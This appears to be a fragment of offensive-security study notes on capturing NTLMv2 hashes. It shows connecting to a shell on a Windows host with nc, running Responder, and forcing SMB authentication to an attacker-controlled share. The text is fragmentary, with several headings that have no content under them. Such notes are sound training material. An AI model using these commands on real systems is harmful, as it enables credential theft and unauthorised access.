NTLMv2
SMB Authentication
Direct SMB Auth
# achieving RCE as a non-privileged user
$ nc 192.168.235.211 4444
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
files01\paul
C:\Windows\system32>net user paul
net user paul
User name paul
Full Name paul power
<SNIP>
Local Group Memberships *Remote Desktop Users *Users# launching the SMB server on the attacking machine
$ sudo responder -I tun0# connecting to a non-existent share to force authentication
C:\Windows\system32>dir \\192.168.45.186\test
dir \\192.168.45.186\test
Access is denied.SMB Auth via Upload

BadPDF
NTMLv2 Relay
Last updated